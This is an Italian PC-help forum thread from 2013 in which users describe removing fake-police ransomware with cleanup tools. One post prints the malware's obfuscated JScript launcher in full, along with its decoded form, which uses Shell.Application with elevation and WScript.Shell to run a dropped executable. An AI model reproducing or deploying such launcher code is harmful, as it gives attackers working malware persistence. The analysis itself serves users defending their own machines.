Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Google Pixel 8a: può diventare un vero best buy? La recensione
Google Pixel 8a: può diventare un vero best buy? La recensione
Google ha capito che la serie "a" dei suoi Pixel piace agli utenti per vari motivi e per questo ha deciso di proporre sul mercato questo nuovo Pixel 8a che ha il sapore di uno smartphone migliorato rispetto alla passata generazione, con processore top di gamma ma ad un prezzo forse un po’ esagerato al momento.  
MSI Vector 16 HX A13V è un notebook gaming che fa sentire la sua potenza (e non solo)
MSI Vector 16 HX A13V è un notebook gaming che fa sentire la sua potenza (e non solo)
Abbiamo provato il notebook Vector 16 HX A13V di MSI, un sistema che coniuga hardware di fascia desktop con un buon insieme di porte. Il display Full HD+ permette alla RTX 4080 Laptop di garantire prestazioni top per diversi anni, ma proprio il display e la rumorosità massima rappresentano due nei per un portatile altrimenti convincente.
In Photoshop arriva l'IA di nuova generazione
In Photoshop arriva l'IA di nuova generazione
È disponibile in fase beta la funzione Genertive Fill avanzata di Photoshop, basata su Firefly 3. Più qualità e controllo, grazie soprattutto alle immagini di riferimento, e integrazione perfetta, ma l'utilizzo dell'IA non è più illimitato e gratuito.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 08-01-2013, 13:35   #101
Liku Fanele
Member
 
Iscritto dal: May 2010
Messaggi: 209
Ciao, son qui che ti leggo però non essendo un utente esperto di PC (anzi, tutt'altro) sto valutando la tua prima risposta (perché già la seconda è un po' più impegnativa...) però leggo che combofix non guarda in faccia a nessuno.

In altri termini ho letto che è un ultima spiaggia solamente per utenti esperti...
Liku Fanele è offline   Rispondi citando il messaggio o parte di esso
Old 08-01-2013, 13:38   #102
FiorDiLatte
Senior Member
 
L'Avatar di FiorDiLatte
 
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
Se è il pc di casa, che lo usi solo Tu vai tranquillo, non fa del male, più di quello che già fa il tuo antivirus.

bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1
FiorDiLatte è offline   Rispondi citando il messaggio o parte di esso
Old 08-01-2013, 13:41   #103
Liku Fanele
Member
 
Iscritto dal: May 2010
Messaggi: 209
Vabbè, allora vado...

Ci sentiamo fra un po'...

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino...

3) ho ovviamente stoppato tutto la procedura

Ultima modifica di Liku Fanele : 08-01-2013 alle 13:56.
Liku Fanele è offline   Rispondi citando il messaggio o parte di esso
Old 08-01-2013, 20:18   #104
FiorDiLatte
Senior Member
 
L'Avatar di FiorDiLatte
 
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
Quote:
Originariamente inviato da Liku Fanele Guarda i messaggi
Vabbè, allora vado...

Ci sentiamo fra un po'...

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino...

3) ho ovviamente stoppato tutto la procedura
1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc.


bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1
FiorDiLatte è offline   Rispondi citando il messaggio o parte di esso
Old 09-01-2013, 09:28   #105
Liku Fanele
Member
 
Iscritto dal: May 2010
Messaggi: 209
Quote:
Originariamente inviato da FiorDiLatte Guarda i messaggi
1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc.


bye
Avete visto colonne di fumo in giro? Bene, perché il mio PC non ha preso fuoco

Per adesso il problema è risolto: bravi

Grazie, a presto
Liku Fanele è offline   Rispondi citando il messaggio o parte di esso
Old 09-01-2013, 19:38   #106
orione67
Senior Member
 
L'Avatar di orione67
 
Iscritto dal: Mar 2001
Messaggi: 1931
Quote:
Originariamente inviato da FiorDiLatte Guarda i messaggi
ps= gradirei conoscere la Vostra esperienza su questo malware.
Beccato ieri sera navigando con Firefox (in versione beta, la 19.0a2 di Aurora) sul mio vecchio portatile Toshiba con WinXp e AVGfree 2013... Terribile esperienza poichè in più di dieci anni di attività con i pc windows era la prima volta che prendevo un virus così potente, in maniera subdola ed inaspettata tale da bloccare qualsiasi intervento, anche in modalità provvisoria. La cosa strana è che non ho frequentato alcun sito piccante nè sono andato su siti alla ricerca di software piratato dove notoriamente è possibile prendere virus... la famigerata schermata della pseudo polizia postale mi è apparsa all'improvviso, dopo esser sparito per qualche istante il desktop...
Già rassegnato all'idea di dover formattare, fortunatamente avevo un'altro pc e con una breve ricerca su internet mi sono affidato alla soluzione offerta dal ComboFix... Alla fine, portatile disinfettato e qualche ora di sonno perse...
orione67 è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2013, 16:19   #107
max60
Senior Member
 
L'Avatar di max60
 
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
Mi autoquoto al post di Orione: la stessa cosa è successa a me ieri sera.
Stavo navigando con Firefox su siti assolutamente tranquilli (cercavo recensioni di un certo modello di gomme invernali), a un certo punto è sparito il dekstop, per una frazione di secondo ho visto MSE che cercava di dire qualcosa, ma poi è apparsa a tutto schermo la videata con l'avviso della polizia di stato (e relativa richiesta di 100 € per la sistemazione).
La stessa cosa succedeva anche in modalità provvisoria, per cui non ho potuto adottare alcuni interventi consigliati su Internet.

Allora sono partito con un liveCD e ho cancellato manualmente dalla cartella documenti un eseguibile sicuramente maligno, e da esecuzione automatica il link a questo eseguible.
A quel punto il pc si è finalmente avviato, e ho fatto una passatona con MalwareBytes che ha trovato altri 3 elementi nocivi e li ha messi in quarantena.
Ora mi chiedo: devo fare altro (es. Combofix) ?

Cosa fa esattamente questo virus ?
Ho sentito dire che può anche crittografare i files, rendendoli inutilizzabili.

Ho letto in rete che anche gente con Avast e Avira ultimamente si è beccato questo virus.
Vorrei levare al più presto MSE che ieri sera mi ha profondamente deluso, ma con cosa lo sostituisco ?
max60 è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2013, 17:44   #108
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
Quote:
Originariamente inviato da nV 25 Guarda i messaggi
chi ha difficoltà a rimuovere il malware in questione con HitmanPro, provi quantomeno a vedere se la modalità "forzata" riesce a sortire qualche effetto.

Qui potete vedere anche il filmato http://hitmanpro.wordpress.com/2010/...ce-breach-mode.
Se non erro, cmq, da modalità amministratore è sufficiente tener premuto il tasto CTRL di sinistra mentre si lancia appunto HitmanPro.
sempre in relazione ad HitmanPro, segnalo che è stata introdotta un'ulteriore tecnologia (Kickstart) pensata tra l'altro per avere ragione anche dei virus oggetto di questo thread (ramsomware, "riscatto").

Questa tecnologia prevede la creazione di un'apposita unità USB con cui effettuare il boot automatizzando di conseguenza tutto il processo di rimozione.

Video che mostra come creare l'unità USB

Video che mostra come utilizzarlo

Se vi può servire, l'uso è davvero banale...

NB: compatibile da XP a 7

Ultima modifica di nV 25 : 10-01-2013 alle 17:46.
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 11-01-2013, 07:53   #109
max60
Senior Member
 
L'Avatar di max60
 
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
Ieri sera ho cantato vittoria troppo presto.
Malwarebytes ha si eliminato un po' di roba, in particolare quella finestra del "ricatto" che impediva qualsiasi attività, ma poi usando un po' il pc questo era enormemente rallentato, Hijackthis si bloccava a 3/4 della scansione e rimaneva impallato, cliccando con il dx sul desktop usciva il menù contestuale dopo quasi 2 minuti d'orologio, Windows segnalava la mancanza di antivirus e firewall anche se presenti, ecc. ecc.
Allora ho provato Combofix e questo dopo circa mezz'ora di lavoro mi ha eliminato un po' di roba.
Vedo nel log che però ha trovato fra i files creati recentemente, anche questo:

2013-01-09 22:16 . 2013-01-10 05:51 3032 ----a-w- c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Non mi piace tanto quel nome, non vorrà dire che qualcosa è rimasto ancora ?
Adesso dopo la passata con Combofix il pc è molto più reattivo, ma sarà davvero finita ?
Se postassi il log di Combofix, qualcuno me lo potrebbe controllare ?
Grazie.
max60 è offline   Rispondi citando il messaggio o parte di esso
Old 11-01-2013, 09:37   #110
FiorDiLatte
Senior Member
 
L'Avatar di FiorDiLatte
 
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
Postalo.

bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1
FiorDiLatte è offline   Rispondi citando il messaggio o parte di esso
Old 12-01-2013, 14:24   #111
pindol
Senior Member
 
L'Avatar di pindol
 
Iscritto dal: Jan 2001
Messaggi: 3693
salve ragazzi,

un mio amico ha preso questo virus e ora tocca a me sistemare le rogne, sono riuscito in un modo o nell'altro a debellarlo, anche se non del tutto, ho cambiato cartella al file wdsgdgsdsgdsg.exe e ora ovviamente all'autoavvio non lo trova più e quindi non parte.

poi ho fatto una scansione con avira e me lo rileva giustamente come minaccia e lo ho fatto mettere in quarantena assieme a altri 3-4 file che ha trovato.

il problema dove sta ora?

semplice il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?

Pindol
__________________
Nel mercatino, concluso positivamente con: Cloale, xdominique, pannox, GhinghinO, alecine, @recidivo@, HI-Giona, Kevin34, Kinta, ToTo1706, alexburt1, dragonballfusion, Blackxx, Jas2000, albanomax, dav117, wolf82, Telcar
pindol è offline   Rispondi citando il messaggio o parte di esso
Old 12-01-2013, 16:19   #112
ferrorules
Senior Member
 
Iscritto dal: Aug 2000
Messaggi: 393
Qualche servizio ancora attivo.. quindi ti consiglio di usare combofix, malwarebyte, virit e un bel ccleaner per pulire i temporanei; fatto questo il pc dovrebbe ritornare a riprendersi :-)

Inviato dal mio GT-I9300 con Tapatalk 2
ferrorules è offline   Rispondi citando il messaggio o parte di esso
Old 12-01-2013, 22:20   #113
max60
Senior Member
 
L'Avatar di max60
 
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
Quote:
Originariamente inviato da FiorDiLatte Guarda i messaggi
Postalo.
Eccolo: logCombofix.txt
Grazie


Quote:
Originariamente inviato da pindol Guarda i messaggi
salve ragazzi,
il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?
Prova anche tu Combofix, per me è stato risolutivo.
Non avere fretta, fallo lavorare finche si riavvia il sistema e prosegue con le sue attività.
max60 è offline   Rispondi citando il messaggio o parte di esso
Old 16-01-2013, 00:10   #114
FiorDiLatte
Senior Member
 
L'Avatar di FiorDiLatte
 
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
Ciao,

questo va cancellato (magari anche con "autoruns" se li rileva o il GMER):

c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Consiglio l'installazione di un firewall software come l'OnlineArmor che dovrebbe ribloccare il malware in questione.

bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1
FiorDiLatte è offline   Rispondi citando il messaggio o parte di esso
Old 17-01-2013, 18:26   #115
mario.trifuoggi
Junior Member
 
Iscritto dal: Jan 2013
Messaggi: 2
Salve a tutti,
avevo aperto l'altro ieri il thread seguente riguardante una variante di questo virus:

http://www.hwupgrade.it/forum/showthread.php?t=2538472

E' stato chiuso suggerendomi di venire qui; tuttavia avevo già letto per intero questo thread e, se ne avevo aperto un altro, è a causa di una anomalia che non riscontro in un nessun altro caso citato.

Come potete leggere, non ho avuto problemi a debellare il virus; tuttavia la maggior parte dei miei file (compresi quelli contenuti in una memoria esterna) sono diventati illeggibili. E non intendo criptati, ma proprio illeggibili: infatti non hanno cambiato estensione, nome o dimensione. Inoltre tutti i decrypter citati non hanno sortito effetto..

Nessun recupero è stato possibile nemmeno con svariati software di recupero.

Volevo sapere se avevate esperienza di altri casi simili o suggerimenti per "riparare" file.
Grazie
mario.trifuoggi è offline   Rispondi citando il messaggio o parte di esso
Old 30-01-2013, 08:17   #116
il divino
Senior Member
 
L'Avatar di il divino
 
Iscritto dal: Jul 2006
Città: Alessandria
Messaggi: 2778
mi sono beccat o2 volte in un meso questa bestiaccia . . . e non ho nemmeno capito come. . . .

Comunque dato che mi funge solo la provvisoria con prompt ho usato combofix e in 5 min ho risolto tutto.

Al seconndo giro, brutta sorpresa, mi appare un messaggio tipo:

La data é 30-01-2013, la versione di comboxif é scaduta, cancellare e scaricare una nuova versione.

E logicamente sul sito il download non é temporaneamente disponibile.

Chiedo disperatamente aiuto per debellare il virus e consigli per prevenire nuove infezioni

attualmentemi difendo con Avira e Malawarebyte.
__________________
AsRock Fatal1ty H97 Killer - Intel I7 4790 - 2x8gb DDR3 Crucial Ballistix Tactical 1600 cl8 - MSI GTX 1660 - Creative Sound Blaster Audigy 2 - SSD Samsung 840 EVO 250gb - HHD Toshiba 2000GB - Cooler Master N400 - Corsair CX600M - Samsung SyncMaster245B
D3: abe77#2296
il divino è offline   Rispondi citando il messaggio o parte di esso
Old 30-01-2013, 08:52   #117
max60
Senior Member
 
L'Avatar di max60
 
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
E' vero, Combofix non risulta scaricabile al momento.
Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?

Ho letto cmq che anche HitmanPro dovrebbe risolvere, lo hai provato ?

Ultima modifica di max60 : 30-01-2013 alle 08:54.
max60 è offline   Rispondi citando il messaggio o parte di esso
Old 30-01-2013, 11:46   #118
orione67
Senior Member
 
L'Avatar di orione67
 
Iscritto dal: Mar 2001
Messaggi: 1931
Quote:
Originariamente inviato da max60 Guarda i messaggi
Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?
Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci...

P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...
orione67 è offline   Rispondi citando il messaggio o parte di esso
Old 30-01-2013, 12:32   #119
il divino
Senior Member
 
L'Avatar di il divino
 
Iscritto dal: Jul 2006
Città: Alessandria
Messaggi: 2778
sono riuscito a riavviare!

sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo.


ho win7 e uso internet explorer

Come difese ho avira e malawarebyte

Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

cosa dovrei fare per pararmi il . . . .

Grazie!
__________________
AsRock Fatal1ty H97 Killer - Intel I7 4790 - 2x8gb DDR3 Crucial Ballistix Tactical 1600 cl8 - MSI GTX 1660 - Creative Sound Blaster Audigy 2 - SSD Samsung 840 EVO 250gb - HHD Toshiba 2000GB - Cooler Master N400 - Corsair CX600M - Samsung SyncMaster245B
D3: abe77#2296
il divino è offline   Rispondi citando il messaggio o parte di esso
Old 30-01-2013, 13:32   #120
max60
Senior Member
 
L'Avatar di max60
 
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
Quote:
Originariamente inviato da orione67 Guarda i messaggi
Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci...
Beh non è proprio così scontato che per bypassare il periodo di validità di un software, sia sufficiente portare indietro la data del computer.
Se fosse così le trial anche di software costosi avrebbero vita infinita ...

Quote:
Originariamente inviato da orione67 Guarda i messaggi
P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...
Anch'io avevo quel file dsgsdgdsgdsgw.js sul pc, è buono che AVG te l'abbia riconosciuto come pericoloso e te l'ha spostato in quarantena.
Nel mio caso (allora avevo MSE), l'antivirus di Microsoft non se n'era neanche accorto.
Me l'ha trovato Combofix e l'ho tolto dalla cartella documenti.
Comunque l'ho salvato e l'ho aperto con blocco note, tanto è un javascript.
E' interessante quello che c'è dentro.
Il contenuto è questo:
Codice:
var w = String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(65)+String.fromCharCode(112)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(105)+String.fromCharCode(99)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(110);
var a = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(87)+String.fromCharCode(73)+String.fromCharCode(78)+String.fromCharCode(68)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(115)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(109)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32);
var s = String.fromCharCode(99)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(103)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(120)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(119)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(100)+String.fromCharCode(115)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(44)+String.fromCharCode(72)+String.fromCharCode(49)+String.fromCharCode(78)+String.fromCharCode(51);
var m = String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(115);
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108);
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);
all'apparenza non si capisce una mazza, visto che compone il codice usando la codifica chr dei caratteri.
Ma incorporando il codice in una pagina html e facendo il document.write delle variabili che usa, la cosa assume un significato più chiaro e il codice diventa questo:
Codice:
var w = Shell.Application;
var a = C:\\WINDOWS\\system32\\rundll32.exe;
var s = c:\docume~1\giomax~1\wgsdgsdgdsgsd.exe ,H1N3;
var m = runas;
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = WScript.Shell;
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);
In pratica utilizza la shell di windows per eseguire il programma wgsdgsdgdsgsd.exe che era stato messo all'interno della cartella documenti.
Il tutto credo che venisse attivato da un collegamento presente in esecuzione automatica.
Quello l'ho proprio cancellato e non me lo sono salvato.

Quote:
Originariamente inviato da il divino Guarda i messaggi
Come difese ho avira e malawarebyte
Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .
Non è un buon segno se il firewall ti risulta disattivato.
magari hai ancora qualche porcata in giro.
Provato HitmanPro se ti scova qualcosa ?
max60 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Google Pixel 8a: può diventare un vero best buy? La recensione Google Pixel 8a: può diventare un vero be...
MSI Vector 16 HX A13V è un notebook gaming che fa sentire la sua potenza (e non solo) MSI Vector 16 HX A13V è un notebook gamin...
In Photoshop arriva l'IA di nuova generazione In Photoshop arriva l'IA di nuova generazione
Recensione realme 12+: sfida la fascia media con un design unico e un display luminosissimo Recensione realme 12+: sfida la fascia media con...
OnePlus Pad Go: un tablet economico perfetto per l'intrattenimento. La recensione OnePlus Pad Go: un tablet economico perfetto per...
Navicella spaziale Boeing CST-100 Starli...
Tutti gli Apple Watch in offerta: si par...
Edge 50 Pro 5G 12/256GB a 599€ e altri a...
Ecco tutte le svendite Amazon del Weeken...
Narwal Freo X Plus e Narwal Freo X Ultra...
Tutti i MacBook in offerta su Amazon: si...
La wallbox per la ricarica delle auto el...
Google Pixel 8 Pro (825€), iPhone 15 Pro...
Solo 269€ il portatile low cost con 16GB...
La NASA sarebbe ancora incerta sulla mis...
Buchi neri in fase di fusione nell'Unive...
IBM lancia Qiskit 1.0: il software devel...
Problema al sistema propulsivo per la so...
Call of Duty: il prossimo titolo del fra...
Overlay PlayStation Network per PC: cos'...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 00:08.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Served by www1v